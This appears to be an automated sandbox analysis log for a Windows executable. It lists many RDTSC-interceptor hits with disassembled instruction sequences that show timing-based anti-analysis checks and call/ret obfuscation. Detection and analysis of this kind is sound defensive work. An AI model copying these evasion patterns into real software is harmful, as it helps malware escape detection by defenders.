Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D6AC5 second address: 5D6AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D6AD1 second address: 5D6AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEBD887DA88h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | RDTSC instruction interceptor: First address: 5D6AEF second address: 5D6AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D6AF5 second address: 5D6AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5D753A second address: 5D7542 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5DBBB3 second address: 5DBBC3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEBD887DA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5DBBC3 second address: 5DBBC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5DC337 second address: 5DC34B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEBD887DA78h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5DC34B second address: 5DC351 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5DC351 second address: 5DC375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEBD887DA82h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5DC375 second address: 5DC379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5DC379 second address: 5DC37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5DC37F second address: 5DC389 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEBD8FBE23Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 59D3A3 second address: 59D3BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 59D3BF second address: 59D3C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FEBD8FBE236h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 59D3C9 second address: 59D3CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 59D3CD second address: 59D3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E22EF second address: 5E22F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E2596 second address: 5E259A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E280E second address: 5E2812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E2812 second address: 5E281C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E281C second address: 5E2870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEBD887DA81h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jbe 00007FEBD887DA88h 0x00000013 jns 00007FEBD887DA8Bh 0x00000019 jo 00007FEBD887DA7Eh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E29A6 second address: 5E29CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FEBD8FBE248h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E29CD second address: 5E29D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5F4B second address: 5E5F55 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEBD8FBE236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5F55 second address: 5E5F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEBD887DA87h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5F70 second address: 5E5FBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 5AAA7422h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FEBD8FBE238h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 pushad 0x0000002a mov ebx, dword ptr [ebp+122D361Bh] 0x00000030 mov ax, di 0x00000033 popad 0x00000034 sbb di, 6406h 0x00000039 call 00007FEBD8FBE239h 0x0000003e push ebx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5FBD second address: 5E5FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5FC3 second address: 5E5FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEBD8FBE249h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5FE7 second address: 5E5FFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5FFE second address: 5E6008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FEBD8FBE236h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6008 second address: 5E6034 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jg 00007FEBD887DA8Bh 0x00000013 jmp 00007FEBD887DA85h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6034 second address: 5E6038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E663D second address: 5E6641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6641 second address: 5E665F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE23Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FEBD8FBE23Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E665F second address: 5E6663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E67A4 second address: 5E67A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6C1A second address: 5E6C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6C1E second address: 5E6C41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6C41 second address: 5E6C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6C46 second address: 5E6C4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6C4C second address: 5E6C79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push ebx 0x0000000a mov esi, dword ptr [ebp+122D33F3h] 0x00000010 pop edi 0x00000011 nop 0x00000012 jl 00007FEBD887DA85h 0x00000018 jmp 00007FEBD887DA7Fh 0x0000001d push eax 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6DED second address: 5E6DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6DF3 second address: 5E6DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6DF7 second address: 5E6E18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE244h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6E18 second address: 5E6E1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6FED second address: 5E6FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6FFA second address: 5E6FFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E6FFE second address: 5E7004 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E7004 second address: 5E701C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEBD887DA84h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E701C second address: 5E7020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E96AC second address: 5E9708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007FEBD887DA78h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007FEBD887DA78h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 0000001Bh 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d jnp 00007FEBD887DA76h 0x00000043 push 00000000h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push ebx 0x00000049 push edi 0x0000004a pop edi 0x0000004b pop ebx 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E9571 second address: 5E9577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E9708 second address: 5E9712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FEBD887DA76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EA79B second address: 5EA7A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E9F11 second address: 5E9F17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E9F17 second address: 5E9F1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EC836 second address: 5EC83C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EC62A second address: 5EC630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EC83C second address: 5EC842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EC842 second address: 5EC846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EC630 second address: 5EC634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EDDCE second address: 5EDE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007FEBD8FBE246h 0x0000000b jmp 00007FEBD8FBE242h 0x00000010 popad 0x00000011 popad 0x00000012 nop 0x00000013 mov si, ax 0x00000016 push 00000000h 0x00000018 jmp 00007FEBD8FBE23Dh 0x0000001d mov dword ptr [ebp+122D1BD7h], edx 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007FEBD8FBE238h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 00000016h 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D1B94h], edi 0x00000045 xchg eax, ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FEBD8FBE23Dh 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EF7D1 second address: 5EF7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EF7D7 second address: 5EF7DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F1725 second address: 5F1734 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FEBD887DA76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EE6CE second address: 5EE6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5EE6D2 second address: 5EE6D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5A0937 second address: 5A093B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5A093B second address: 5A094B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEBD887DA76h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F37AA second address: 5F37AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F545D second address: 5F5461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F642E second address: 5F6434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F6434 second address: 5F64AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FEBD887DA76h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+122D2032h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FEBD887DA78h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov di, BDE4h 0x00000035 jmp 00007FEBD887DA7Eh 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007FEBD887DA78h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 mov dword ptr [ebp+122DB2CCh], edx 0x0000005c xchg eax, esi 0x0000005d push esi 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F64AB second address: 5F64CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEBD8FBE244h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F64CB second address: 5F64EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FEBD887DA7Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F569A second address: 5F56C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FEBD8FBE244h 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FEBD8FBE236h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F65D3 second address: 5F65D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F65D9 second address: 5F65E8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F65E8 second address: 5F65F2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEBD887DA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F65F2 second address: 5F6692 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEBD8FBE23Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b add dword ptr [ebp+122D1FDFh], edx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FEBD8FBE238h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 sub dword ptr [ebp+124650F9h], edx 0x00000038 mov bx, dx 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov ebx, esi 0x00000044 mov eax, dword ptr [ebp+122D1649h] 0x0000004a push 00000000h 0x0000004c push eax 0x0000004d call 00007FEBD8FBE238h 0x00000052 pop eax 0x00000053 mov dword ptr [esp+04h], eax 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc eax 0x00000060 push eax 0x00000061 ret 0x00000062 pop eax 0x00000063 ret 0x00000064 jno 00007FEBD8FBE23Bh 0x0000006a push FFFFFFFFh 0x0000006c push edx 0x0000006d mov ebx, esi 0x0000006f pop ebx 0x00000070 nop 0x00000071 jmp 00007FEBD8FBE241h 0x00000076 push eax 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b popad 0x0000007c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F75F0 second address: 5F75F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F93A9 second address: 5F93B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
